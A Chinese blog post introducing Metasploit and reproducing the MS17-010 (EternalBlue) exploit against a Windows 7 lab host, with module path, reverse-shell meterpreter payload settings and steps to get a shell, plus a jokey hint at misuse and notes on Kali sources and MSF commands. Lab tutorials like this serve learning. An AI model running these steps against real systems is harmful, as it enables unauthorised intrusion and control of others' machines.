美文网首页
Nine Msf介绍及MS17-010(永恒之蓝)复现

Nine Msf介绍及MS17-010(永恒之蓝)复现

作者: _Beginner | 来源:发表于2020-03-09 14:48 被阅读0次

    一.介绍和准备

    1、本文介绍Msf及MS17-010(永恒之蓝)复现

    2、环境:kali(IP:192.168.1.184)、win7(IP:192.168.1.98)

    3、使用的工具:metasploit、天境

    4、准备:将kali更新到最新版本:终端打开后输入“ apt-get update && apt-get upgrade ” 完成后再输入“ apt-get dist-upgrade ”等待完成即可。


    二.MSF介绍/MS17-010(永恒之蓝)复现

    1、介绍:1)Metasploit:是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。详细介绍点我

                     2)MS17-010(永恒之蓝)漏洞原理是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码

                    注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让资源可互通。

    2、使用天境对对win7进行扫描过后,发现MS17-010(永恒之蓝):

    3、于是,打开kali进入msfconsole,seach ms17-010:

          1)若出现:WARNING: No database support: No database YAML file;  终端输入“ msfdb init ” 即可。

          2)若出现:cannot load such file -- bundler/setup;终端输入sudo gem install bundler、bundle update celluloid即可。

          3)由于我的肉鸡是win7,所以吧use 2(use exploit/windows/smb/ms17_010_eternalblue);然后info看看:

            4)设置一下目标/肉鸡、地址/IP(set 192.168.1.98)和Paylod(set payload windows/x64/meterpreter/reverse_tcp),然后show options,还需要设置一下控制端:

              5)set lhost 192.168.1.184(kali的IP地址),设置好后exploit/run一下,然后用shell就进入win7:

              6)既然都进到win7了,能干什么你们懂吧??哈哈哈。。。。。。。。


    三.MSF常识

    1、更新源:1)vi /etc/apt/sources.list

                      2)# kali官方源

                        deb http://http.kali.org/ kali-rolling main non-free contrib

                        deb-src http://http.kali.org/ kali-rolling main non-free contrib

                        #中科大源

                        deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib                   

                        deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

                     3)若更新出现错误,添加一下签名:

                        wget archive.kali.org/archive-key.asc   //下载签名

                        apt-key add archive-key.asc   //安装签名

    2、MSF Kali下存放目录:/usr/share/MSF-framework/

    3、1)Modules:用户用到的各种模块几乎都在这里。

          2)Auxiliary:主要包含渗透测试中一些辅助性的脚本。

          3)Encoders:各种编码工具 用于躲过入侵检测和过滤系统。

          4)Exploits:主要包含了传说中的exp、0day、各种漏洞利用的脚本。

          5)Nops: NOP (No Operation or Next Operation) sled,由于IDS/IPS检查数据包中不规则的数据。

          6)Payloads :是攻击者发送给系统执行的指令(目标机执行);exploits是本地机执行作用于目标机;命名规则是:系统/类型/名称。

          7)Post: 这个目录里放着msf 的exploits执行成功后,向目标机发送的一些功能性指令比如:提权,获取hash等。

          8)Data:放工具和一些用户接口代码

          9)Plugins:各种要用到的插件。

          10)Scripts:这个目录下的文件大都是Meterpreter利用的脚本。

          11)Tools:包含一些有用的脚本和零散的工具。

    4、 1)search 搜索模块名和描述。

           2)use:进入。

           3)back :返回。

           4)Banner命令,显示一个MSF的banner。

           5)info 显示信息。

           6)irb进入irb脚本模式。

          7)jobs显示和管理作业

          8)sleep:在限定的秒数内什么也不做。

          9)unset/unsetg:解出一个或多个变量。

          10)unload:卸载一个模块。

          11) resource:运行储存一个文件中的命令。

          12)route:查看一个会话的路由信息。

    相关文章

      网友评论

          本文标题:Nine Msf介绍及MS17-010(永恒之蓝)复现

          本文链接:https://www.haomeiwen.com/subject/vxkpdhtx.html